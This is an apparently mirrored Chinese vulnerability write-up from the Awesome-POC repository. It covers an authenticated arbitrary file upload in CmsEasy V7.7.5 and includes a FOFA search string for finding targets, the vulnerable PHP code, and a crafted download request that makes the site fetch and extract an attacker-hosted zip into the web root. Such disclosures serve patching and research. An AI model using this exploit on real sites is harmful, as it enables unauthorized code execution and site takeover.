admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/CmsEasy update_admin.php 后台任意文件上传漏洞.md

120 lines
3.7 KiB
Markdown
Raw Normal View History

更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
# CmsEasy update_admin.php 后台任意文件上传漏洞
## 漏洞描述
CmsEasy 后台存在任意文件上传漏洞,通过文件 service.php 加密Url参数执行即可上传任意文件
## 影响版本
```
CmsEasy V7.7.5_20210919
```
## FOFA
```
body="cmseasyedit"
```
## 漏洞复现
![image-20220518143113914](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181436747.png)
存在漏洞的文件为 `lib/admin/update_admin.php`
![image-20220518143714802](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181437877.png)
其中需要注意的代码为
```
function downfile_action()
{
$url = front::get('url');
$url=service::getInstance()->unlockString($url,"cmseasy_url");
$res = $this->get_file($url, 'cache');
if (!$res) {
$res = array(
'err' => 1,
'data' => lang_admin('update_package_download_failed'),
);
} else {
@unlink('upgrade/config_cn.php');
@unlink('upgrade/config_cn.tmp.php');
@unlink('upgrade/upgrade.sql');
@unlink('upgrade/command.php');
front::remove(ROOT.'/cache/data');
front::remove(ROOT.'/cache/template');//清空全部语言
$langdata=getlang();
if($langdata != ""){
foreach ($langdata as $key=>$val){
front::remove(ROOT.'/cache/'.$val['langurlname']);
front::remove(ROOT.'/'.$val['langurlname'].'/template');
}
}
//先清空缓存
user::deletesession();
category::deletesession();
//提取分类
if(file_exists(ROOT."/lib/table/type.php")) {
type::deletesession();
}
//提取专题
if(file_exists(ROOT."/lib/table/special.php")) {
special::deletesession();
}
$archive = new PclZip('cache/patch.zip');
$archive->extract(PCLZIP_OPT_PATH, ROOT, PCLZIP_OPT_REPLACE_NEWER);
if(file_exists('upgrade/upgrade.sql')) {
$sqlquery = file_get_contents('upgrade/upgrade.sql');
$sqlquery = str_replace('`cmseasy_', '`' . config::getdatabase('database', 'prefix'), $sqlquery);
$sqlquery = str_replace("\r", "", $sqlquery);
$sqls = preg_split("/;(--)*[ \t]{0,}\n/", $sqlquery);
$this->exec_cms_sql($sqls);
}
if(file_exists('upgrade/command.php')){
include ROOT . '/upgrade/command.php';
}
$res = array(
'err' => 0,
'message' => $this->message,
'data' => lang_admin('upgrade_successful'),
);
}
echo json_encode($res);
exit;
}
```
其中使用 unlockString 和 get_file 方法
```
$url = front::get('url');
$url=service::getInstance()->unlockString($url,"cmseasy_url");
$res = $this->get_file($url, 'cache');
```
![image-20220518143733612](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181437707.png)
写入后在上层目录写入文件即Web根目录创建压缩包并上传可访问的服务器上
```
zip phpinfo.zip phpinfo.php
```
构造下载请求
![image-20220518143751402](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181437504.png)
```
/index.php?case=update&act=downfile&admin_dir=admin&site=default&url=buTdBnP8%3DJ%3DELYuF8Z2IwZyM-awr9fH%3D0cax6mxICukxw
```
![image-20220518143812559](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181438629.png)
![image-20220518143830101](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181438160.png)
Reference in New Issue Copy Permalink